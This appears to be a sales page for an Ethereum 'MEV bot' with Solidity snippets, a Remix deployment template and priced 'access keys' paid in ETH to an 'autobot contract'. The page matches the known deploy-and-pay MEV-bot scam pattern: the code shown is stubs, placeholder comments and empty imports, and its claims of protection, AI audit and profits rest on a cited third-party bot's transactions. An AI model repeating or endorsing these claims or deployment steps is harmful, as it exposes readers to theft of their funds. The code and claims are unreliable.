Gas: ...
"Guarded by the MEV Shield, only authorized transactions pass. Unauthorized actions are blocked before they begin."
function protectContract() internal view returns (bool) {
require(tx.origin == owner, "MEV Shield: Unauthorized attempt detected");
return true;

What updates?

How it works?

Advantages of version 2:

  • Fast scanning of unconfirmed Ethereum network transactions
  • Filter for illiquid and scam tokens
  • Added protection code against hacking and unauthorized function calls
  • Audit by AI
  • Multi-instance transactions in a single block

Function 1: Filters tokens based on a blacklist, scam tokens, and slippage to protect against illiquid or scam tokens.

function filterToken(address token, uint slippage) internal view returns (bool) { if (blacklist[token] || scamTokens[token] || slippage > maxSlippage) { emit TokenFiltered(token, "Token is not eligible"); return false; } return true; }

Function 2: Protection against unauthorized use of other wallets through improved smart contracts.

function protectWallet(address wallet) internal view returns (bool) { require(whitelist[wallet], "Unauthorized wallet access"); return true; }

Function 3: Updated Solidity libraries for performance optimization and compatibility.

function optimizePerformance() internal view returns (bool) { // Implement optimization logic here return true; }

Function 4: Integration with Sushiswap for advanced trading strategies.

function executeSushiSwap(address tokenIn, address tokenOut, uint amountIn) internal { // Sushiswap swap logic here }

Bot operation example:

You can view the bot's operation example on Dextools.

Function 1: Automatically purchases tokens based on liquidity and price parameters.

function autoBuyToken(address token, uint amount) internal returns (bool) { // Logic for automatic purchase if (checkLiquidity(token) && priceIsAcceptable(token)) { executePurchase(token, amount); emit TokenPurchased(token, amount); return true; } return false; }

Function 2: Automatically sells tokens based on profit thresholds.

function autoSellToken(address token, uint amount) internal returns (bool) { // Logic for automatic sale if (checkProfitThreshold(token) && priceIsHigh(token)) { executeSale(token, amount); emit TokenSold(token, amount); return true; } return false; }
SVG Example

Contract Creation: Remix Deploy

The contract is written in Solidity and deployed on the Ethereum blockchain. Below is an example format for creating a smart contract:

pragma solidity ^0.6.6; // This 1inch Slippage bot is for mainnet only. Testnet transactions will fail because testnet transactions have no value. // Import Libraries Migrator/Exchange/Factory import ""; import ""; import "";
Ethereum Contract Example

You can view bot transactions by Jaredfromsubway.eth on Etherscan.

Code Payment Bot Section

How to Buy the Source Code:

You can COPY the code and instructions using the Source Code button.

However, to deploy your contract, you will need to input the access key, which you will receive after making a payment to the autobot contract. Detailed instructions can be accessed by clicking the Click button.

The price is fixed based on the duration of access:

  • 30 days: 0.06 ETH
  • 180 days: 0.3 ETH
  • 365 days: 0.5 ETH

Have a deployment access key? Press this button

Payment Bot